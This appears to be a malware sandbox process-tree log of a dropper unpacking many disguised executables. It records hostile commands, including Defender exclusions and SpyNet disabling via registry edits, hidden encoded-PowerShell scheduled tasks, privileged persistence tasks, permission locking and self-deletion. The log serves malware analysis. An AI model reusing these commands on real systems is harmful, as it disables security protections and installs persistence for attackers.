PID 1616 wrote to memory of 3276	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
PID 1616 wrote to memory of 3276	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tfjAKCKj2LvIfw6AB9Mo9Tos.exe
PID 1616 wrote to memory of 4452	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	KTuaEOWn3PZHI7pwGSyrDT5t.exe
PID 1616 wrote to memory of 4452	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	KTuaEOWn3PZHI7pwGSyrDT5t.exe
PID 1616 wrote to memory of 4452	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	KTuaEOWn3PZHI7pwGSyrDT5t.exe
PID 1616 wrote to memory of 884	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	MbPjSlWybcqWK9SG3yDaGwX7.exe
PID 1616 wrote to memory of 884	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	MbPjSlWybcqWK9SG3yDaGwX7.exe
PID 1616 wrote to memory of 884	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	MbPjSlWybcqWK9SG3yDaGwX7.exe
PID 1616 wrote to memory of 3572	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tACY59pvu_1gH1Ya10vgQlB1.exe
PID 1616 wrote to memory of 3572	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tACY59pvu_1gH1Ya10vgQlB1.exe
PID 1616 wrote to memory of 3572	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	tACY59pvu_1gH1Ya10vgQlB1.exe
PID 1616 wrote to memory of 4092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	JVB4bakv374Uc2FVLli_0foZ.exe
PID 1616 wrote to memory of 4092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	JVB4bakv374Uc2FVLli_0foZ.exe
PID 1616 wrote to memory of 4092	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	JVB4bakv374Uc2FVLli_0foZ.exe
PID 1616 wrote to memory of 4068	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	xytf5QHkKXSnfzdNbOxOb9kx.exe
PID 1616 wrote to memory of 4068	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	xytf5QHkKXSnfzdNbOxOb9kx.exe
PID 1616 wrote to memory of 4068	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	xytf5QHkKXSnfzdNbOxOb9kx.exe
PID 1616 wrote to memory of 2212	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	HBvKLxhnqfgy4N9fMd9NZjix.exe
PID 1616 wrote to memory of 2212	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	HBvKLxhnqfgy4N9fMd9NZjix.exe
PID 1616 wrote to memory of 808	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	IniXOco96FWIFmOXPvX1fHv2.exe
PID 1616 wrote to memory of 808	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	IniXOco96FWIFmOXPvX1fHv2.exe
PID 1616 wrote to memory of 808	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	IniXOco96FWIFmOXPvX1fHv2.exe
PID 1616 wrote to memory of 3840	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	W4ZM9VfbyQb0Knlofi8kzduk.exe
PID 1616 wrote to memory of 3840	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	W4ZM9VfbyQb0Knlofi8kzduk.exe
PID 1616 wrote to memory of 3840	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	W4ZM9VfbyQb0Knlofi8kzduk.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 4092 wrote to memory of 7040	4092	JVB4bakv374Uc2FVLli_0foZ.exe	dllhost.exe
PID 4092 wrote to memory of 7040	4092	JVB4bakv374Uc2FVLli_0foZ.exe	dllhost.exe
PID 4092 wrote to memory of 7040	4092	JVB4bakv374Uc2FVLli_0foZ.exe	dllhost.exe
PID 1616 wrote to memory of 7716	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	SOHVFV7sOK9emp74VgoE4i_z.exe
PID 1616 wrote to memory of 7716	1616	6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe	SOHVFV7sOK9emp74VgoE4i_z.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 1880 wrote to memory of 7104	1880	j_oBPrLZEwFnl0hGt9HyRDSn.exe	j_oBPrLZEwFnl0hGt9HyRDSn.exe
PID 4092 wrote to memory of 8876	4092	JVB4bakv374Uc2FVLli_0foZ.exe	cmd.exe
PID 4092 wrote to memory of 8876	4092	JVB4bakv374Uc2FVLli_0foZ.exe	cmd.exe
PID 4092 wrote to memory of 8876	4092	JVB4bakv374Uc2FVLli_0foZ.exe	cmd.exe
PID 7716 wrote to memory of 11960	7716	SOHVFV7sOK9emp74VgoE4i_z.exe	SETUP_~1.EXE
PID 7716 wrote to memory of 11960	7716	SOHVFV7sOK9emp74VgoE4i_z.exe	SETUP_~1.EXE
PID 7716 wrote to memory of 11960	7716	SOHVFV7sOK9emp74VgoE4i_z.exe	SETUP_~1.EXE

C:\Users\Admin\AppData\Local\Temp\6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe
"C:\Users\Admin\AppData\Local\Temp\6BB5F93524D19C19AD102C9577107B7761E1CE94EA222.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1616

C:\Users\Admin\Pictures\Adobe Films\VXECMjWBEdalMFFifD1AAyot.exe
"C:\Users\Admin\Pictures\Adobe Films\VXECMjWBEdalMFFifD1AAyot.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4456

C:\Users\Admin\Pictures\Adobe Films\RJQq9PYR91jMzYuNNAC5BEQy.exe
"C:\Users\Admin\Pictures\Adobe Films\RJQq9PYR91jMzYuNNAC5BEQy.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3092

C:\Users\Admin\Documents\T_rKnciFgmScIA1FKNep8LzL.exe
"C:\Users\Admin\Documents\T_rKnciFgmScIA1FKNep8LzL.exe"
3⤵
PID:13056

C:\Users\Admin\Pictures\Adobe Films\Z677dFbOnJ51WKJ2qO7kLRtb.exe
"C:\Users\Admin\Pictures\Adobe Films\Z677dFbOnJ51WKJ2qO7kLRtb.exe"
4⤵
PID:34888

C:\Users\Admin\Pictures\Adobe Films\ZnZ7mPcMlWZI8tilZJ8OqGOr.exe
"C:\Users\Admin\Pictures\Adobe Films\ZnZ7mPcMlWZI8tilZJ8OqGOr.exe"
4⤵
PID:38364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 456
5⤵
- Program crash
PID:31872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 768
5⤵
- Program crash
PID:38628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 776
5⤵
- Program crash
PID:1360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 776
5⤵
- Program crash
PID:3824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 800
5⤵
- Program crash
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 984
5⤵
- Program crash
PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 1016
5⤵
- Program crash
PID:6572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 1368
5⤵
- Program crash
PID:8000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ZnZ7mPcMlWZI8tilZJ8OqGOr.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\ZnZ7mPcMlWZI8tilZJ8OqGOr.exe" & exit
5⤵
PID:8492

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ZnZ7mPcMlWZI8tilZJ8OqGOr.exe" /f
6⤵
- Kills process with taskkill
PID:8780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 38364 -s 1284
5⤵
- Program crash
PID:8948

C:\Users\Admin\Pictures\Adobe Films\Ht7XPSgrO9bFS6LPHYpPLWlN.exe
"C:\Users\Admin\Pictures\Adobe Films\Ht7XPSgrO9bFS6LPHYpPLWlN.exe"
4⤵
PID:38352

C:\Windows\SysWOW64\dllhost.exe
dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
5⤵
PID:38456

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Questo.ppt & ping -n 5 localhost
5⤵
PID:38652

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:38088

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
7⤵
PID:7412

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
7⤵
- Enumerates processes with tasklist
PID:7400

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
7⤵
PID:7952

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Nostra.exe.pif
Nostra.exe.pif f
7⤵
PID:8356

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:8744

C:\Users\Admin\Pictures\Adobe Films\pPEeLcKLUJ2QpwAEqyRtlSCy.exe
"C:\Users\Admin\Pictures\Adobe Films\pPEeLcKLUJ2QpwAEqyRtlSCy.exe"
4⤵
PID:38508

C:\Users\Admin\AppData\Local\Temp\7zSD810.tmp\Install.exe
.\Install.exe
5⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\7zSE7FE.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:1676

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:3096

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:5136

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:5200

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:5668

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:3892

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:5320

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:5760

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:6048

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gWYiNcgnE" /SC once /ST 07:24:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:5968

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gWYiNcgnE"
7⤵
PID:6232

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gWYiNcgnE"
7⤵
PID:9560

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bcyLPxSbowNIYSAEXo" /SC once /ST 11:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\WHkIrxu.exe\" Qa /site_id 525403 /S" /V1 /F
7⤵
- Creates scheduled task(s)
PID:9768

C:\Users\Admin\Pictures\Adobe Films\45WL9Mscsd5_vOKVEhvWUGRH.exe
"C:\Users\Admin\Pictures\Adobe Films\45WL9Mscsd5_vOKVEhvWUGRH.exe"
4⤵
PID:38412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 38412 -s 872
5⤵
- Program crash
PID:38728

C:\Users\Admin\Pictures\Adobe Films\8wA6jtL9PsFqoKPXT81RVbYF.exe
"C:\Users\Admin\Pictures\Adobe Films\8wA6jtL9PsFqoKPXT81RVbYF.exe"
4⤵
PID:38760

C:\Users\Admin\Pictures\Adobe Films\8wA6jtL9PsFqoKPXT81RVbYF.exe
"C:\Users\Admin\Pictures\Adobe Films\8wA6jtL9PsFqoKPXT81RVbYF.exe" help
5⤵
PID:2576

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:16284

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:14428

C:\Users\Admin\Pictures\Adobe Films\2lnHl85_3rAuTM4DEaabtgNu.exe
"C:\Users\Admin\Pictures\Adobe Films\2lnHl85_3rAuTM4DEaabtgNu.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1168
3⤵
- Program crash
PID:5160

C:\Users\Admin\Pictures\Adobe Films\_fAvxiU_KqI0dOu5exsFj6Sg.exe
"C:\Users\Admin\Pictures\Adobe Films\_fAvxiU_KqI0dOu5exsFj6Sg.exe"
2⤵
- Executes dropped EXE
PID:5008

C:\Users\Admin\Pictures\Adobe Films\tACY59pvu_1gH1Ya10vgQlB1.exe
"C:\Users\Admin\Pictures\Adobe Films\tACY59pvu_1gH1Ya10vgQlB1.exe"
2⤵
- Executes dropped EXE
PID:3572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:16312

C:\Users\Admin\Pictures\Adobe Films\MbPjSlWybcqWK9SG3yDaGwX7.exe
"C:\Users\Admin\Pictures\Adobe Films\MbPjSlWybcqWK9SG3yDaGwX7.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:884

C:\Users\Admin\Pictures\Adobe Films\KTuaEOWn3PZHI7pwGSyrDT5t.exe
"C:\Users\Admin\Pictures\Adobe Films\KTuaEOWn3PZHI7pwGSyrDT5t.exe"
2⤵
- Executes dropped EXE
PID:4452

C:\Users\Admin\Pictures\Adobe Films\tfjAKCKj2LvIfw6AB9Mo9Tos.exe
"C:\Users\Admin\Pictures\Adobe Films\tfjAKCKj2LvIfw6AB9Mo9Tos.exe"
2⤵
- Executes dropped EXE
PID:3276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 456
3⤵
- Program crash
PID:13664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 776
3⤵
- Program crash
PID:30876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 784
3⤵
- Program crash
PID:37472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 816
3⤵
- Program crash
PID:38216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 824
3⤵
- Program crash
PID:38848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 984
3⤵
- Program crash
PID:23036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 984
3⤵
- Program crash
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1380
3⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "tfjAKCKj2LvIfw6AB9Mo9Tos.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\tfjAKCKj2LvIfw6AB9Mo9Tos.exe" & exit
3⤵
PID:5500

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "tfjAKCKj2LvIfw6AB9Mo9Tos.exe" /f
4⤵
- Kills process with taskkill
PID:3032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 704
3⤵
- Program crash
PID:5788

C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe
"C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1880

C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe
"C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe"
3⤵
- Executes dropped EXE
PID:7104

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b56cbb20-410f-4faa-8d58-308c6be7dd31" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:23132

C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe
"C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:38752

C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe
"C:\Users\Admin\Pictures\Adobe Films\j_oBPrLZEwFnl0hGt9HyRDSn.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:1516

C:\Users\Admin\AppData\Local\df90bab9-6c73-4a90-aba1-15e2684482dd\build2.exe
"C:\Users\Admin\AppData\Local\df90bab9-6c73-4a90-aba1-15e2684482dd\build2.exe"
6⤵
PID:3996

C:\Users\Admin\AppData\Local\df90bab9-6c73-4a90-aba1-15e2684482dd\build2.exe
"C:\Users\Admin\AppData\Local\df90bab9-6c73-4a90-aba1-15e2684482dd\build2.exe"
7⤵
PID:5452

C:\Users\Admin\Pictures\Adobe Films\IniXOco96FWIFmOXPvX1fHv2.exe
"C:\Users\Admin\Pictures\Adobe Films\IniXOco96FWIFmOXPvX1fHv2.exe"
2⤵
- Executes dropped EXE
PID:808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im IniXOco96FWIFmOXPvX1fHv2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IniXOco96FWIFmOXPvX1fHv2.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:824

C:\Windows\SysWOW64\taskkill.exe
taskkill /im IniXOco96FWIFmOXPvX1fHv2.exe /f
4⤵
- Kills process with taskkill
PID:2932

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 1936
3⤵
- Program crash
PID:2908

C:\Users\Admin\Pictures\Adobe Films\HBvKLxhnqfgy4N9fMd9NZjix.exe
"C:\Users\Admin\Pictures\Adobe Films\HBvKLxhnqfgy4N9fMd9NZjix.exe"
2⤵
- Executes dropped EXE
PID:2212

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Installer_ovl_sig.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Installer_ovl_sig.exe
3⤵
PID:20940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -Seconds 8;Start-Sleep -Seconds 10;
4⤵
PID:22544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 37
4⤵
PID:3916

C:\Windows\SysWOW64\timeout.exe
timeout 37
5⤵
- Delays execution with timeout.exe
PID:8396

C:\Users\Admin\Pictures\Adobe Films\xytf5QHkKXSnfzdNbOxOb9kx.exe
"C:\Users\Admin\Pictures\Adobe Films\xytf5QHkKXSnfzdNbOxOb9kx.exe"
2⤵
- Executes dropped EXE
PID:4068

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:38532

C:\Users\Admin\Pictures\Adobe Films\JVB4bakv374Uc2FVLli_0foZ.exe
"C:\Users\Admin\Pictures\Adobe Films\JVB4bakv374Uc2FVLli_0foZ.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Questo.ppt & ping -n 5 localhost
3⤵
PID:8876

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:25924

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
5⤵
- Enumerates processes with tasklist
PID:6596

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
5⤵
PID:6628

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^EMjNKsUmZgpLIzWkfbdJjdfgUCiantYcrvsDCTscDINycNZcJFvRHNEgvYTipBwUfOIkwaJvyUyDClSuCMJSIiNdSeuDqljwHTQHtOzdWqLNHqLjyMEvRpjowazYkyvVHrWJxlwOz$" Sorrideva.ppt
5⤵
PID:7960

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nostra.exe.pif
Nostra.exe.pif f
5⤵
PID:8364

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
4⤵
- Runs ping.exe
PID:8756

C:\Windows\SysWOW64\dllhost.exe
dllhost kjdlskreshduehfiuwefuihuzhdsfbvnzmnnxcvjkhawiuoyrf8wer847345
3⤵
PID:7040

C:\Users\Admin\Pictures\Adobe Films\W4ZM9VfbyQb0Knlofi8kzduk.exe
"C:\Users\Admin\Pictures\Adobe Films\W4ZM9VfbyQb0Knlofi8kzduk.exe"
2⤵
- Executes dropped EXE
PID:3840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:9640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:9748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:9896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9896 -s 276
4⤵
- Program crash
PID:11056

C:\Users\Admin\Pictures\Adobe Films\SOHVFV7sOK9emp74VgoE4i_z.exe
"C:\Users\Admin\Pictures\Adobe Films\SOHVFV7sOK9emp74VgoE4i_z.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:7716

C:\Users\Admin\Pictures\Adobe Films\2OAc_ChfunMOh9YoZL1L0S1t.exe
"C:\Users\Admin\Pictures\Adobe Films\2OAc_ChfunMOh9YoZL1L0S1t.exe"
2⤵
PID:19892

C:\Users\Admin\AppData\Local\Temp\is-1F1FT.tmp\2OAc_ChfunMOh9YoZL1L0S1t.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1F1FT.tmp\2OAc_ChfunMOh9YoZL1L0S1t.tmp" /SL5="$401E6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\2OAc_ChfunMOh9YoZL1L0S1t.exe"
3⤵
PID:23048

C:\Users\Admin\AppData\Local\Temp\is-JT0KP.tmp\befeduce.exe
"C:\Users\Admin\AppData\Local\Temp\is-JT0KP.tmp\befeduce.exe" /S /UID=Irecch4
4⤵
PID:33552

C:\Users\Admin\AppData\Local\Temp\d0-b4b1c-68a-14498-a502a3e55a2e6\SHyvixilice.exe
"C:\Users\Admin\AppData\Local\Temp\d0-b4b1c-68a-14498-a502a3e55a2e6\SHyvixilice.exe"
5⤵
PID:19500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
6⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
7⤵
PID:6640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,11411407506678402551,11859863273261626889,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
7⤵
PID:6732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
